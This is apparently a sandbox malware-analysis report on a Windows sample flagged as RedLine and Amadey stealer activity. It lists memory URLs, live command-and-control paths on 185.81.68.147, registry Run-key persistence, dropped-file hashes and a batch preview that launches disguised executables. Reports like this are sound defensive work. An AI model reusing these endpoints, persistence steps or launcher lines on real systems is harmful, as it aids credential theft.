                                                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl058B.tmp.zx.exe, 00000014.00000003.2269378400.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262938360.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270616048.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262788389.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2271470360.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262583394.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2270146141.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2262397211.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2263140535.000001E7FAE61000.00000004.00000020.00020000.00000000.sdmp, 58B.tmp.zx.exe, 00000014.00000003.2272495227.000001E7FAE63000.00000004.00000020.00020000.00000000.sdmp, libcrypto-1_1.dll.20.drfalse
                                                                                                                                            high
                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tempuri.org/Entity/Id13ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://tempuri.org/Entity/Id12ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://tempuri.org/Entity/Id7ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoDB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id4ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2002/12/policyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://tempuri.org/Entity/Id22ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://tempuri.org/Entity/Id16ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://tempuri.org/Entity/Id19ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id18ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.openssl.org/Hlibcrypto-1_1.dll.20.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://tempuri.org/Entity/Id3ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://schemas.datacontract.org/2004/07/System.ServiceModelDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/soap/actor/nextDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id14ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
IP:185.81.68.147
Domain:unknown
Country:Finland
ASN:50108
ASN Name:KLNOPT-ASFI
Malicious:true
                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1575318
                                                                                                                                                                                                                    Start date and time:2024-12-15 09:11:06 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 9m 56s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:K6qneGSDSB.exe
                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                    Original Sample Name:52c82f6ceb8cf41de8a4c01b313e3712.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@36/60@0/1
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 65%
                                                                                                                                                                                                                    • Number of executed functions: 190
                                                                                                                                                                                                                    • Number of non-executed functions: 279
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • VT rate limit hit for: K6qneGSDSB.exe
Time | Type | Description
03:11:57 | API Interceptor | 4949x Sleep call for process: msiexec.exe modified
03:11:57 | API Interceptor | 4949x Sleep call for process: audiodg.exe modified
03:11:57 | API Interceptor | 237428x Sleep call for process: explorer.exe modified
03:12:22 | API Interceptor | 82x Sleep call for process: DB9C.tmp.ssg.exe modified
09:12:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
09:12:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.81.68.147 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
185.81.68.147 | mggoBrtk9t.exe | malicious | Amadey, RedLine | 185.81.68.147/7vhfjke3/index.php
185.81.68.147 | D72j5I83wU.dll | malicious | Amadey | 185.81.68.147/7vhfjke3/index.php
185.81.68.147 | D72j5I83wU.dll | malicious | Amadey | 185.81.68.147/7vhfjke3/index.php
185.81.68.147 | hoPazBDFG9.dll | malicious | Amadey | 185.81.68.147/7vhfjke3/index.php?wal=1
185.81.68.147 | tOuVwTJrau.exe | malicious | Amadey | 185.81.68.147/7vhfjke3/index.php
185.81.68.147 | yINR7uQlPr.exe | malicious | Amadey, RedLine | 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
185.81.68.147 | file.exe | malicious | RedLine | 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
185.81.68.147 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
                                                                                                                                                                                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
KLNOPT-ASFI | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 185.81.68.147
KLNOPT-ASFI | mggoBrtk9t.exe | malicious | Amadey, RedLine | 185.81.68.148
KLNOPT-ASFI | D72j5I83wU.dll | malicious | Amadey | 185.81.68.148
KLNOPT-ASFI | D72j5I83wU.dll | malicious | Amadey | 185.81.68.148
KLNOPT-ASFI | hoPazBDFG9.dll | malicious | Amadey | 185.81.68.148
KLNOPT-ASFI | tOuVwTJrau.exe | malicious | Amadey | 185.81.68.148
KLNOPT-ASFI | eHCgK6fZc2.exe | malicious | RedLine | 185.81.68.147
KLNOPT-ASFI | yINR7uQlPr.exe | malicious | Amadey, RedLine | 185.81.68.148
KLNOPT-ASFI | file.exe | malicious | RedLine | 185.81.68.147
KLNOPT-ASFI | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 185.81.68.147
                                                                                                                                                                                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe | mggoBrtk9t.exe | malicious | Amadey, RedLine
C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe | yINR7uQlPr.exe | malicious | Amadey, RedLine
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3293
                                                                                                                                                                                                                        Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                        MD5:4ED743F7E1676539C322DAB36E328377
                                                                                                                                                                                                                        SHA1:AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
                                                                                                                                                                                                                        SHA-256:EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
                                                                                                                                                                                                                        SHA-512:024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1022
                                                                                                                                                                                                                        Entropy (8bit):5.252542495586483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                                                                                                                                                                                                        MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                                                                                                                                                                                                        SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                                                                                                                                                                                                        SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                                                                                                                                                                                                        SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):309760
                                                                                                                                                                                                                        Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                        MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                        SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                        SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                        SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5915958
                                                                                                                                                                                                                        Entropy (8bit):7.9860937778360945
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:ce0q2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFaeu8+qBC:cp0HiouWJysVYvsOaoyMxxvjDDAx0aec
                                                                                                                                                                                                                        MD5:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        SHA1:FFBAC13D000872DBF5A0BCE2B6ADDF5315E59532
                                                                                                                                                                                                                        SHA-256:F40224CA24A6D189791058779EB4C9BAB224CAA58B00BD787B1FF981D285D5A4
                                                                                                                                                                                                                        SHA-512:B186331B49E7821466FD003980F9CA57F5BCF41574C1D1893B8949D8A944FFE67F06D8A67D4BFDF4599FCD4F3282C36BED1FC8585E1F8DD541E8FDF121F48EEB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Grabber.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):4.391379540616391
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:NNgr+jdLXW5QVBNVKdLXW5WGACovn:Nu+hLXW6B4LXW2vn
                                                                                                                                                                                                                        MD5:B3367D004A5EFA2C859EC672A5FED667
                                                                                                                                                                                                                        SHA1:E6E66E075F078ACBB4D82F8C5B3F9A65BA9B00FD
                                                                                                                                                                                                                        SHA-256:56BC5E6EEFDC679A26DF1223EFAD6C98B755EDB6C707EF7E5940262AC6EC76CC
                                                                                                                                                                                                                        SHA-512:22A4E92E6E7241FC28C5B8554B0EF435774BB6D12CEB20CDC2207FDFEE2E7CA12B649B57C2407B5519D01A95A7DA60AD0DF2D828F0838E19C46B2F798BF3C7F1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@shift /0..start configs\update.exe..start configs\svchost.exe..
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):307712
                                                                                                                                                                                                                        Entropy (8bit):5.081279904923014
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
                                                                                                                                                                                                                        MD5:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                        SHA1:92EF2FD33F713D72207209EC65F0DE6EEF395AF5
                                                                                                                                                                                                                        SHA-256:94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                                                                                                                                                                                                                        SHA-512:AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: mggoBrtk9t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):89752
                                                                                                                                                                                                                        Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
                                                                                                                                                                                                                        MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                                        SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                                        SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                                        SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):84040
                                                                                                                                                                                                                        Entropy (8bit):6.41469022264903
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
                                                                                                                                                                                                                        MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
                                                                                                                                                                                                                        SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
                                                                                                                                                                                                                        SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
                                                                                                                                                                                                                        SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):123464
                                                                                                                                                                                                                        Entropy (8bit):5.886703955852103
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
                                                                                                                                                                                                                        MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
                                                                                                                                                                                                                        SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
